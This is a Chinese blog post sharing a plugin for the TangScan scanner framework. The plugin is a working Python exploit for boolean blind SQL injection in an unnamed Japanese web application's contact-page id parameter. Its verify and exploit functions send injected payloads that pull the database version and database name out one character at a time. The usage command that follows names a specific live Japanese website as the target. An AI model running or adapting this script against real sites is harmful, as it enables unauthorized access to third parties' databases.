A-A+
TangScan-master 日本jp某通用程序SQL注入插件–‘盲注判断字符’
【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import string
import time
from thirdparty import requests
from modules.exploit import TSExploit
class TangScan(TSExploit):
def __init__(self):
super(self.__class__, self).__init__()
self.info = {
"name": "Jp SQL injection",
"product": "",
"product_version": "",
"desc": """
日本某程序SQL漏洞检测插件
""",
"license": self.license.TS,
"author": ["虾米 https://woj.app"],
"ref": [
{self.ref.wooyun: "http://www.wooyun.org/bugs/wooyun-2016-0187803"},
],
"type": self.type.injection,
"privileged": False,
"disclosure_date": "",
"create_date": ""
}
self.register_option({
"url": {
"default": "",
"required": True,
"choices": [],
"convert": self.convert.url_field,
"desc": ""
}
})
self.register_result({
"status": False,
"data": {
},
"description": "",
"error": ""
})
def verify(self):
user = ""
user_length = 0
url = ("{domain}/contact/?id=".format(domain=self.option.url))
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate"
}
payloads = ['@','_','.', '-', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']+ list(string.ascii_lowercase)
l = "1' AND (length(version())-%s)!=0 AND 'sbsb'='sbsb"
s = "1' AND ORD(MID((IFNULL(CAST(version() AS CHAR),0x20)),%s,1))!=%s AND 'sbsb'='sbsb"
for x in range(1, 30):
tmp = l % str(x)
exps_url = url + tmp
try:
print exps_url
response = requests.get(exps_url, timeout=15, headers=headers, verify=False)
time.sleep(0.3)#限制请求速率
if response.status_code != 200:
self.result.status = False
return
except Exception,e:
self.result.error = str(e)
return
if response.content.find("name=\"\" method") != -1:
user_length = x
break
if user_length == 0:
self.result.status = False
return
for x in range(1, user_length+1):
for payload in payloads:
a = s % (str(x), str(ord(payload)))
exps_url = url + a
try:
print exps_url, user_length
response = requests.get(exps_url, timeout=15, headers=headers, verify=False)
time.sleep(0.3)#限制请求速率
if response.status_code != 200:
self.result.status = False
return
except Exception,e:
self.result.error = str(e)
return
if response.content.find("name=\"\" method") != -1:
user = user + payload
break
if user.find("5.")==-1:#减小误报机率
self.result.status = False
return
self.result.status = True
self.result.description = "目标 {url} 存在SQL注入漏洞, 获取到的当前数据库版本为:{db_user}".format(
url=self.option.url,
db_user=user
)
def exploit(self):
user = ""
user_length = 0
url = ("{domain}/contact/?id=".format(domain=self.option.url))
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/39.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate"
}
payloads = list(string.ascii_lowercase)+ ['@','_','.', '-', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0']
l = "1' AND (length(database())-%s)!=0 AND 'sbsb'='sbsb"
s = "1' AND ORD(MID((IFNULL(CAST(database() AS CHAR),0x20)),%s,1))!=%s AND 'sbsb'='sbsb"
for x in range(1, 100):
tmp = l % str(x)
exps_url = url + tmp
try:
response = requests.get(exps_url, timeout=15, headers=headers, verify=False)
time.sleep(0.3)#限制请求速率
if response.status_code != 200:
self.result.status = False
return
except Exception,e:
self.result.error = str(e)
return
if response.content.find("name=\"\" method") != -1:
user_length = x
break
if user_length == 0:
self.result.status = False
return
for x in range(1, user_length+1):
for payload in payloads:
a = s % (str(x), str(ord(payload)))
exps_url = url + a
try:
response = requests.get(exps_url, timeout=15, headers=headers, verify=False)
time.sleep(0.3)#限制请求速率
if response.status_code != 200:
self.result.status = False
return
except Exception,e:
self.result.error = str(e)
return
if response.content.find("name=\"\" method") != -1:
user = user + payload
break
self.result.status = True
self.result.description = "目标 {url} 获取到的当前数据库名称为:{db_user}".format(
url=self.option.url,
db_user=user
)
if __name__ == '__main__':
from modules.main import main
main(TangScan()) |
使用命令: 789.py --url http://www.seanskitchen.jp --mode exploit
默认命令:789.py --url http://www.seanskitchen.jp --mode exploit
框架下载地址:https://github.com/WooYun/TangScan
布施恩德可便相知重
微信扫一扫打赏
支付宝扫一扫打赏